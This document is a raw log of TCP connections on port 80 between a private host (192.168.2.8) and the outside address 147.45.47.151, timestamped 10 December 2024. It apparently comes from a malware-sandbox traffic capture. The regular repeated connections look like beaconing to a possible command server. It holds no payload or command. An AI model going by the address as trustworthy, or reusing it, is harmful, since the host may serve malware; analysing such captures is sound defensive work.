                                                                                          Dec 10, 2024 07:28:43.392225981 CET8049737147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:43.392265081 CET8049737147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:43.454592943 CET8049738147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:43.454622030 CET8049738147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:43.454710007 CET8049738147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:44.153390884 CET8049737147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:44.225753069 CET4973780192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:44.244064093 CET8049738147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:44.389072895 CET8049737147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:44.428893089 CET4973880192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:44.481054068 CET8049738147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:44.615433931 CET4973780192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:44.615483046 CET4973880192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:44.615763903 CET4973980192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:44.615813971 CET4973680192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:44.735044003 CET8049739147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:44.735168934 CET4973980192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:44.735332012 CET4973980192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:44.735440016 CET8049737147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:44.735491037 CET4973780192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:44.736385107 CET8049738147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:44.736439943 CET4973880192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:44.736582041 CET8049736147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:44.736623049 CET4973680192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:44.854598045 CET8049739147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:45.134495974 CET4973980192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:45.253962994 CET8049739147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:45.253988981 CET8049739147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:45.253998995 CET8049739147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:46.002932072 CET8049739147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:46.116393089 CET4973980192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:46.237037897 CET8049739147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:46.365607977 CET4974080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:46.365668058 CET4973980192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:46.485814095 CET8049740147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:46.485929012 CET4974080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:46.486129045 CET4974080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:46.486187935 CET8049739147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:46.486236095 CET4973980192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:46.605488062 CET8049740147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:46.837968111 CET4974080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:46.958034039 CET8049740147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:46.958050966 CET8049740147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:46.958169937 CET8049740147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:47.757304907 CET8049740147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:47.819505930 CET4974080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:47.980964899 CET8049740147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:48.119988918 CET4974080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:48.535415888 CET4974180192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:48.535507917 CET4974080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:48.654802084 CET8049741147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:48.655169964 CET8049740147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:48.655270100 CET4974080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:48.655277967 CET4974180192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:48.655504942 CET4974180192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:48.774774075 CET8049741147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:49.007172108 CET4974180192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:49.126585960 CET8049741147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:49.126627922 CET8049741147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:49.126662016 CET8049741147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:49.398710012 CET4974280192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:49.399055958 CET4974180192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:49.518080950 CET8049742147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:49.519015074 CET4974280192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:49.519457102 CET4974280192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:49.553215027 CET4974380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:49.564771891 CET8049741147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:49.635123014 CET8049741147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:49.638714075 CET4974180192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:49.638730049 CET8049742147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:49.672503948 CET8049743147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:49.672630072 CET4974380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:49.672847033 CET4974380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:49.792088985 CET8049743147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:49.873718023 CET4974280192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:49.993172884 CET8049742147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:49.993236065 CET8049742147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:50.022743940 CET4974380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:50.142189026 CET8049743147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:50.142303944 CET8049743147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:50.142362118 CET8049743147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:50.779553890 CET8049742147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:50.928857088 CET4974280192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:50.937582016 CET8049743147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:51.012898922 CET8049742147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:51.131954908 CET4974380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:51.131975889 CET4974280192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:51.172975063 CET8049743147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:51.319495916 CET4974380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:51.345236063 CET4974280192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:51.345385075 CET4974380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:51.346225023 CET4974480192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:51.464890003 CET8049742147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:51.464952946 CET4974280192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:51.465408087 CET8049743147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:51.465457916 CET4974380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:51.465481043 CET8049744147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:51.465558052 CET4974480192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:51.465725899 CET4974480192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:51.584956884 CET8049744147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:51.883992910 CET4974480192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:52.003505945 CET8049744147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:52.003528118 CET8049744147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:52.003552914 CET8049744147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:52.727351904 CET8049744147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:52.928834915 CET4974480192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:52.960665941 CET8049744147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:53.109021902 CET4974480192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:53.109867096 CET4974580192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:53.228878975 CET8049744147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:53.229223013 CET8049745147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:53.229307890 CET4974480192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:53.229348898 CET4974580192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:53.233284950 CET4974580192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:53.352627993 CET8049745147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:53.677290916 CET4974580192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:53.796757936 CET8049745147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:53.796772003 CET8049745147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:53.796782017 CET8049745147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:54.491266012 CET8049745147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:54.631977081 CET4974580192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:54.725727081 CET8049745147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:54.819461107 CET4974580192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:54.851823092 CET4974580192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:54.852180004 CET4974680192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:54.971479893 CET8049745147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:54.971507072 CET8049746147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:54.971555948 CET4974580192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:54.971620083 CET4974680192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:54.971955061 CET4974680192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:55.091226101 CET8049746147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:55.319562912 CET4974680192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:55.439623117 CET8049746147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:55.439637899 CET8049746147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:55.439649105 CET8049746147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:56.235207081 CET8049746147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:56.319458008 CET4974680192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:56.469012022 CET8049746147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:56.616352081 CET4974680192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:56.741139889 CET4974680192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:56.860563040 CET8049746147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:57.107562065 CET4974680192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:57.142929077 CET8049746147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:57.225708961 CET4974680192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:28:57.227056026 CET8049746147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:28:57.227307081 CET8049746147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:20.204713106 CET8049807147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:20.204739094 CET8049807147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:21.006457090 CET8049807147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:21.116291046 CET4980780192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:21.241146088 CET8049807147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:21.428828955 CET4980780192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:21.610626936 CET4980780192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:21.611273050 CET4981080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:21.730348110 CET8049807147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:21.730437040 CET4980780192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:21.730492115 CET8049810147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:21.730565071 CET4981080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:21.730703115 CET4981080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:21.735596895 CET4981180192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:21.849905968 CET8049810147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:21.856554031 CET8049811147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:21.856627941 CET4981180192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:21.856769085 CET4981180192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:21.976026058 CET8049811147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:22.117626905 CET4981080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:22.210347891 CET4981180192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:22.237247944 CET8049810147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:22.237276077 CET8049810147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:22.329829931 CET8049811147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:22.329843998 CET8049811147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:22.329864025 CET8049811147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:22.991971970 CET8049810147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:23.116358042 CET4981080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:23.117686033 CET8049811147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:23.224808931 CET8049810147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:23.225653887 CET4981180192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:23.352566957 CET8049811147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:23.428788900 CET4981080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:23.429281950 CET4981180192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:23.504371881 CET4981080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:23.504641056 CET4981180192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:23.504915953 CET4981780192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:23.624000072 CET8049810147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:23.624131918 CET8049817147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:23.624221087 CET4981080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:23.624258041 CET4981780192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:23.624428034 CET8049811147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:23.626858950 CET4981180192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:23.649945974 CET4981780192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:23.769318104 CET8049817147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:24.199496031 CET4981780192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:24.319142103 CET8049817147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:24.319156885 CET8049817147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:24.319166899 CET8049817147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:24.886307955 CET8049817147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:25.022547007 CET4981780192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:25.120743990 CET8049817147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:25.225658894 CET4981780192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:25.286859989 CET4981780192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:25.287137032 CET4982380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:25.406512022 CET8049823147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:25.406609058 CET8049817147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:25.406621933 CET4982380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:25.406660080 CET4981780192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:25.407135963 CET4982380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:25.526524067 CET8049823147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:25.757189035 CET4982380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:25.876754999 CET8049823147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:25.876816034 CET8049823147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:25.876836061 CET8049823147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:26.670553923 CET8049823147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:26.741278887 CET4982380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:26.904870033 CET8049823147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:27.116277933 CET4982380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:27.280536890 CET4982380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:27.281089067 CET4982980192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:27.400319099 CET8049823147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:27.400338888 CET8049829147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:27.400412083 CET4982380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:27.400448084 CET4982980192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:27.400634050 CET4982980192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:27.520144939 CET8049829147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:27.757231951 CET4982980192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:27.876801968 CET8049829147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:27.876817942 CET8049829147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:27.876960993 CET8049829147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:28.243597031 CET4983080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:28.363374949 CET8049830147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:28.363506079 CET4983080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:28.363713026 CET4983080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:28.482928991 CET8049830147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:28.661206961 CET8049829147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:28.710391045 CET4983080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:28.819370031 CET4982980192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:28.829780102 CET8049830147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:28.829837084 CET8049830147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:28.900579929 CET8049829147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:29.059477091 CET4982980192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:29.059813023 CET4983280192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:29.179120064 CET8049829147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:29.179135084 CET8049832147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:29.179208040 CET4982980192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:29.179244041 CET4983280192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:29.193119049 CET4983280192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:29.312470913 CET8049832147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:29.624738932 CET8049830147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:29.734828949 CET4983280192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:29.834975958 CET4983080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:29.854214907 CET8049832147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:29.854252100 CET8049832147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:29.854325056 CET8049832147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:29.856539965 CET8049830147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:30.022480011 CET4983080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:30.609009027 CET8049832147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:30.680636883 CET8049832147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:30.680783987 CET4983280192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:30.806147099 CET4983080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:30.806215048 CET4983280192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:30.806473970 CET4983780192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:30.925704002 CET8049830147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:30.925879002 CET8049837147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:30.926000118 CET4983080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:30.926081896 CET4983780192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:30.926282883 CET8049832147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:30.926366091 CET4983780192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:30.926412106 CET4983280192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:31.045538902 CET8049837147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:31.272794962 CET4983780192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:31.392334938 CET8049837147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:31.392373085 CET8049837147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:31.392389059 CET8049837147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:32.191138983 CET8049837147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:32.422295094 CET8049837147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:32.422426939 CET4983780192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:32.803045034 CET4983780192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:32.810549021 CET4984380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:32.922980070 CET8049837147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:32.923150063 CET4983780192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:32.929805994 CET8049843147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:32.929896116 CET4984380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:32.930074930 CET4984380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:33.049887896 CET8049843147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:33.291984081 CET4984380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:33.411509991 CET8049843147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:33.411545992 CET8049843147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:33.411557913 CET8049843147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:34.198673964 CET8049843147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:34.319441080 CET4984380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:34.437215090 CET8049843147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:34.616221905 CET4984380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:34.686347008 CET4984380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:34.686877012 CET4984880192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:34.806232929 CET8049843147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:34.806250095 CET8049848147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:34.806302071 CET4984380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:34.806349039 CET4984880192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:34.905143976 CET4984880192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:34.966089964 CET4985080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:35.024808884 CET8049848147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:35.085674047 CET8049850147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:35.085817099 CET4985080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:35.171231985 CET4985080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:35.291201115 CET8049850147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:35.371032000 CET4984880192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:35.494210958 CET8049848147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:35.494225025 CET8049848147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:35.494234085 CET8049848147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:35.645988941 CET4985080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:35.765491009 CET8049850147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:35.765505075 CET8049850147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:36.068142891 CET8049848147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:36.132015944 CET4984880192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:36.300837040 CET8049848147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:36.347218990 CET8049850147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:36.428864002 CET4984880192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:36.428864956 CET4985080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:36.444899082 CET4984880192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:36.445240021 CET4985580192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:36.564445019 CET8049848147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:36.564465046 CET8049855147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:36.564574003 CET4984880192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:36.564661026 CET4985580192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:36.564995050 CET4985580192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:58.588583946 CET8049915147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:58.631814003 CET4991580192.168.2.8147.45.47.151
